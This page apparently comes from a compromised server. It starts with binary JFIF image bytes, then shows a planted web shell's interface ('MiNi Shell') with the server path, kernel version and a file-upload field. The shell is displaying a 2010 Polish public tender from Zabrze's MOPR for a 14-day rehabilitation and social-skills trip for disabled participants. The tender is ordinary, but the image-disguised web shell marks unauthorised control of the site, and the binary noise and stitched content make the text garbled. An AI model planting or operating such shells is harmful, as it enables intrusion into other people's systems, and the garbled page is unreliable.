JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100617/172536-N-2010.html

<p class="kh_header"><b>Zabrze: organizacja  14-dniowego wyjazdowego treningu kompetencji i umiejętności społecznych połączonego z zespołem ćwiczeń fizycznych usprawniających psychoruchowo z elementami zajęć rehabilitacyjnych zgodnie z potrzebami osób niepełnosprawnych -uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</b><br>
<b>Numer ogłoszenia: 172536 - 2010; data zamieszczenia: 17.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.pl,www.mopr.zabrze.magistrat</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja  14-dniowego wyjazdowego treningu kompetencji i umiejętności społecznych połączonego z zespołem ćwiczeń fizycznych usprawniających psychoruchowo z elementami zajęć rehabilitacyjnych zgodnie z potrzebami osób niepełnosprawnych -uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:  organizacja  14-dniowego wyjazdowego treningu kompetencji i umiejętności społecznych połączonego z zespołem ćwiczeń fizycznych usprawniających psychoruchowo z elementami zajęć rehabilitacyjnych zgodnie z potrzebami osób niepełnosprawnych -uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.
Przedmiot zamówienia według Wspólnego Słownika Zamówień ( CPV)
2. Wymagania szczegółowe dotyczące ośrodka:
a)	Lokalizacja : atrakcyjna miejscowość wypoczynkowa, położona nad morzem w województwie zachodnio - pomorskim 
b)	Standard: obiekt przystosowany dla potrzeb osób niepełnosprawnych, w odległości ok. 200m od morza, dysponujący bazą zabiegową z nowoczesnym sprzętem rehabilitacyjnym, salą gimnastyczną, siłownią oraz stołówką na miejscu. Dodatkowo na terenie ośrodka znajdować się muszą wyznaczone miejsca na rozpalenie ogniska i stanowisko do grillowania z zadaszeniem, salę ze sprzętem audio - video. Ponadto na terenie lub w bliskiej odległości do ok. 300m od ośrodka kryty basen. Dodatkowym atutem będzie bliskość lub posiadanie atrakcji typu boisko do gier zespołowych, stoły do tenisa stołowego, bilard, wypożyczalnia rowerów, ścianka wspinaczkowa.
c)	Pokoje : 2-osobowe, 3 -osobowe, 4-osobowe z pełnym, samodzielnym, węzłem sanitarnym tj. umywalką, wc, prysznicem z zimną i ciepłą wodą. Wyposażenie dla każdego pokoju : oddzielne łóżka, TV, radio, czajnik bezprzewodowy, szklanki, łyżeczki.
d)	Sala szkoleniowa na ok. 40 osób, wyposażona w krzesła, stoły lub krzesła z pulpitem, tablicę.
Ośrodek( Wykonawca) zapewni uczestnikom w trakcie pobytu opiekę lekarską i pielęgniarską oraz obsługę sprzątająco - porządkową dla utrzymania czystości w pokojach i węzłach sanitarnych oraz w pomieszczeniach wspólnego użytku z których będą korzystać uczestnicy.
e)	Posiłki : Na jednego uczestnika, opiekuna, dziecko, koordynatora: codziennie w trakcie pobytu śniadania, obiady i kolacje w formie  szwedzkiego stołu. Dodatkowo suchy prowiant w trakcie podróży na miejsce i z powrotem i w trakcie całodziennych wycieczek, a także co najmniej dwie potrawy gorące z grilla lub z ogniska (porcja mięsa, kiełbasa) pieczywo, ketchup, musztarda, papryka, ogórki, smalec wiejski oraz zimne i gorące napoje. Dostępność w pokojach do wody mineralnej w ilości 1,5 l na osobę na dobę.
f)	Przejazd : na trasie Zabrze - miejsce pobytu i z powrotem. Autokar klimatyzowany z kierowcą , wyposażony w WC i TV, przystosowany dla osób niepełnosprawnych. W przypadku gdy autokar nie pomieści faktycznej ilości osób biorącej udział w wyjeździe, zamawiający dopuszcza możliwość 
przejazdu autokarem i klimatyzowany mikrobusem przystosowanym dla osób niepełnosprawnych.
3.Kadra zapewniana przez Wykonawcę 
a)  Kierownik - opiekun wyjazdu. Zadaniem kierownika-opiekuna będzie m.in. organizacja czasu wolnego i wypoczynku, zapewnienie bezpieczeństwa uczestników, prowadzenie rozmów, ewentualne załatwianie problemów z Ośrodkiem typu organizacyjnego. Kierownik musi koordynować wyjazd  z Zabrza do miejsca pobytu i z powrotem poprzez rozmieszczenie osób w autokarze, opiekę podczas jazdy i postojów.
b)  Psycholog lub psychoterapeuta - do prowadzenia zajęć w zakresie treningu kompetencji i umiejętności społecznych.
c) Osoba posiadająca kwalifikacje do prowadzenia zajęć z autoprezentacji
d) Ponadto w trakcie wyjazdu Wykonawca zapewni w trakcie pobytu opiekę lekarską i pielęgniarską, a także w miarę potrzeb fizjoterapeute, fizykoterapeute, rehabilitanta.
4. Wymagania dotyczące wyjazdu :
Program wyjazdu  obejmuje trening kompetencji i umiejętności społecznych wraz z  autoprezentacją. Dodatkowo zespoły ćwiczeń fizycznych usprawniających psycho - ruchowo lub zajęć rehabilitacyjnych, a także zajęcia rekreacyjno - integracyjne.
4.1. W ramach treningu kompetencji i  umiejętności społecznych Wykonawca zapewni min. 20 - godzinne szkolenie w ramach całego pobytu dla 1 uczestnika w postaci wykładów i ćwiczeń m.in. 
o tematyce :
	 -    przełamywanie stereotypów i barier osób niepełnosprawnych,
      -    stres, pozytywne myślenie, afirmacje, ćwiczenia relaksacyjne,
        -    samoocena, motywowanie siebie dotyczy osób niepełnosprawnych
Oraz w  ramach autoprezentacji - Wykonawca zapewni 2 typy zajęć dla 1 uczestnika z kształtowania wizerunku zewnętrznego osób niepełnosprawnych m.in. o tematyce:
      - wizaż, stylizacja (dobór fryzur i kolorów włosów oraz ubioru do typu sylwetki i wieku)
      - rozmowa kwalifikacyjna, kultura poszukiwania pracy ( mowa ciała, jak dobrze wypaść w rozmowie         kwalifikacyjnej, jak opanować strach przed rozmową kwalifikacyjną) zarówna pod kątem potrzeb kobiet jaki i mężczyzn.
4.2	W ramach dodatkowych zajęć z zakresu zespołu ćwiczeń fizycznych usprawniających psycho - ruchowo zgodnie z potrzebami osób niepełnosprawnych w gabinetach fizjoterapeutycznych i na wolnym powierzu Wykonawca zapewni 20 godzin łącznie w ramach całego pobytu na 1 uczestnika :
a)	Zespół ćwiczeń fizycznych i usprawniających  przykładowo w postaci marszu z kijkami Nordic Walking, gimnastykę na przyrządach fitness, w siłowni, gimnastykę ogólno - rozwojową, aerobik w basenie itp.
b)	Zabiegi  w gabinetach fizjoterapeutycznych itp. według indywidualnych zaleceń lekarza na podstawie informacji o stanie zdrowia stwierdzonej przez lekarza na miejscu oraz w oparciu o dokumentację medyczną uczestnika Ilość zabiegów - dwa dziennie w trakcie całego pobytu wyłączając dzień przyjazdu i odjazdu oraz soboty i niedziele.
c)	Badania lekarskie na początku i końcu pobytu
4.3.Zajęcia Rekreacyjno - Integracyjne w ilości ok. 20 godzin w trakcie całego pobytu na 1 uczestnik, opiekuna, dziecko, koordynatorów Wykonawca zapewni:
4.3.A. ogniska z pieczeniem kiełbasek i grillowanie, wieczorki taneczne z poczęstunkiem, dyskoteki, wieczorki integracyjne z programem rozrywkowo - kulturalnym typu karaoke, projekcie DVD itp.
4.3.B.  Program kulturalno - krajoznawczy tzn. 2 atrakcyjne wycieczki całodniowe z możliwością zwiedzania okolicznych atrakcji uzależnionych od miejsca pobytu np. zwiedzanie latarni morskiej, muzeum, wycieczka rowerowa, wycieczka do Parku Wodnego i skorzystanie z jego atrakcji, przejazd kolejką, kino, wycieczka statkiem itp.
5. Opłata klimatyczna - Wykonawca uwzględni w cenie oferty opłatę klimatyczną jeśli jej naliczanie związane jest z miejscem pobytu.
6. Ubezpieczenie - Wykonawca zobowiązany jest ubezpieczyć wszystkich uczestników, dzieci, opiekunów, koordynatorów od następstw nieszczęśliwych wypadków na okres od dnia rozpoczęcia wyjazdu do jego zakończenia.
7. Termin realizacji : 14 dni w trakcie miesiąca września 2010 r. z uwzględnieniem 3 ostatnich dni sierpnia oraz 3 pierwszych dni października 2010 r.
8. Uczestnicy : 40 uczestników projektu, 3 opiekunów, 11 dzieci w wieku od 7 do 15 lat, 2 koordynatorów. Łącznie 54 + 2 koordynatorów.
Zamawiający zaznacza, iż liczba 54 może ulec zmniejszeniu maksymalnie do 48 osób i 2 koordynatorów  oraz zwiększeniu do maksymalnie 58 osób( uczestników, opiekunów, dzieci) i 2 koorydnatorów.
Uczestnicy niepełnosprawni posiadają n/w stopnie niepełnosprawności:
Umiarkowany - 05-R - 8 osób
Lekki - 05-R - 3 osoby
Umiarkowany - 05-R/07-S -  3 osoby
Lekki - 05-R/04-O - 1 osoba
Umiarkowany - 07-S - 5 osób
Lekki - 07-S/11-I - 1 osoba
Znaczny - 07-S - 1 osoba
Lekki - 02-P - 2 osoby
Umiarkowany - 02-P - 3 osoby
Umiarkowany - 02-P/06/E - 1 osoba
Umiarkowany - T - 1 osoba
Umiarkowany- 08/T - 3 osoby
Lekki - 08-T - 1 osoba
Umiarkowany - N - 1 osoba
Lekki - 10 - N - 1 osoba
Umiarkowany - 03-L - 1 osoba
Lekki - 11 I - 1 osoba
Umiarkowany -  01-U - 1 osoba
Znaczny - 11 - I - 2 osoby
II. A. Opis  dodatkowy :
1. Warunki lokalowe w trakcie programu o którym mowa w pkt  4.1 SWIZ a więc salę szkoleniowa oraz  sprzęt , które muszą spełniać wymogi prawne w zakresie BHP i p.poż. Zapewnione pomieszczenie/sala wyposażona będzie w odpowiednią do liczby uczestników liczbę stolików i miejsc siedzących, właściwie oświetloną, ogrzewaną, przewietrzaną i odizolowaną od innych pomieszczeń.  
2. Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia, ankiety ewaluacyjne muszą posiadać informację: Szkolenie realizowane na potrzeby  projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze  oraz oznaczenia logo EFS, Unii Europejskiej i logo PO KL zgodnie z zasadą wizualizacji dostępną na stronie www.efs.silesia-region.pl w zakładce promocja. 
3. Wykonawca zobowiązany jest do promowania Unii Europejskiej, Europejskiego Funduszu Socjalnego oraz Programu Operacyjnego Kapitał Ludzki między innymi poprzez umieszczenie w miejscu odbywania wyjazdu, miejscu odbywania zajęć ruchowych informację: Szkolenie realizowane na potrzeby  projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze  oraz oznaczenia logo EFS, Unii Europejskiej i logo PO KL zgodnie z zasadą wizualizacji dostępną na stronie www.efs.silesia-region.pl w zakładce promocja.
Przedmiotowe informacje muszą zawierać : znak Kapitał Ludzki Narodowa Strategia Spójności, flagę Unii Europejskiej - Europejskie Fundusz Społeczny, pełną nazwę projektu i informację o współfinansowaniu Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze  Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
4.Materiały niezbędne  do zamieszczenia informacji o współfinansowaniu wyjazdu w ramach projektu systemowego dostarczy Zamawiający.
5.Wykonawca dokona sprawdzenia obecności uczestników na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzą własnoręcznym podpisem.
6.Wykonawca przeprowadzi ewaluację szkolenia na podstawie dostarczonej przez Zamawiającego  ankiety.
7.Zajęcia w ramach szkolenia zrealizują wykładowcy i instruktorzy Wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe.
8.Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów wyjazdu oraz wyda oryginał zaświadczenia o ukończeniu treningu kompetencji i umiejętności społecznych Ponadto Wykonawca dokona archiwizacji w/w dokumentów na okres do 2020r, zapewniając dostęp do przechowywanej dokumentacji w ramach kontroli wykonania przedmiotu zamówienia. Wszystkie dokumenty sporządzane przez Wykonawcę będą opatrzone logotypami projektu systemowego.
9.Zamawiający zastrzega, że jeśli będą tego wymagać osobne przepisy lub wytyczne Instytucji Zarządzającej projektem zawrze z Wykonawcą dodatkową umowę powierzenia przetwarzania danych osobowych uczestników projektu skierowanych na wyjazd..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie wykazu minimum 2 wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług o tematyce będącej przedmiotem postępowania lub podobnej w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie , o wartości 50000 zł netto każda, z podaniem ich wartości , przedmiotu, dat wykonania oraz załączeniem dokumentu potwierdzającego, że usługa ta została wykonana należycie tzw. list referencyjny lub inny dokument potwierdzający, iż usługa została wykonana należycie - załącznik nr 3
Przez tematykę będącą przedmiotem postępowania Zamawiający rozumie zorganizowanie wyjazdu wypoczynkowego wraz z zajęciami rehabilitacyjnymi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu  oraz wykazu osób potwierdzający, że Wykonawca dysponuje lub będzie dysponował osobami posiadającymi odpowiednie kwalifikacje, zawierający informację na temat: kwalifikacji zawodowych, doświadczenia, wykształcenia, posiadanych certyfikatów oraz innych dokumentów potwierdzających wykształcenie, niezbędnych do realizacji zakresu programowego będącego przedmiotem zamówienia - złożonym na druku stanowiącym załącznik nr 4 do SIWZ wraz z kopiami dokumentów potwierdzających przedmiotowe informacje podpisanymi za zgodność z oryginałem</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 3 oraz dołączonych dokumentów wskazanych w  Rozdziale  V SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 3 oraz dołączonych dokumentów wskazanych w  Rozdziale  V SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">listy referencyjne lub inne dokumenty potwierdzające, że usługa została wykonana należycie.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Parafowany wzór umowy, folder ośrodka</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Lokalizacja ośrodka i atrakcyjność programu - 35</li>
<li>3 - Doświadczenie organizatora - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych
- zmiana terminu realizacji zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych  
  przez Zamawiającego najdalej do 17 października 2010 r. - ukończenie.
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego
- zmiana limitów osób - uczestników, opiekunów, dzieci ale nie więcej i nie mniej niż o ilość wynikającą z opisu przedmiotu zamówienia zawartą w SIWZ. W tym również zmiana limitów w zakresie opiekunów i dzieci jednak wartość łączną będzie nie większa i nie mniejsza niż określona w SIWZ. 
- zmiana miejsca odbycia wyjazdu z przyczyn obiektywnych zaakceptowanych przez Zamawiającego na miejsce i standard Ośrodka porównywalny z tym zaproponowanym w ofercie lub lepszy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.magistrat.pl,www.mopr.zabrze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Zabrzu, ul. Roosevelta 40, 41 - 800 Zabrze
Tel. kontaktowy (032) 277-78-68, fax (032) 277-78-68,
Pokój nr 216-2 piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2010 godzina 09:00, miejsce: MOPR, ul. Roosevelta 40, 41 - 800 Zabrze
Tel. kontaktowy (032) 277-78-68, fax (032) 277-78-68,
Godziny urzędowania: od poniedziałku do piątku w godz. 7.30 - 15.30
Kancelaria, pokój 117-1 piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze..</p>
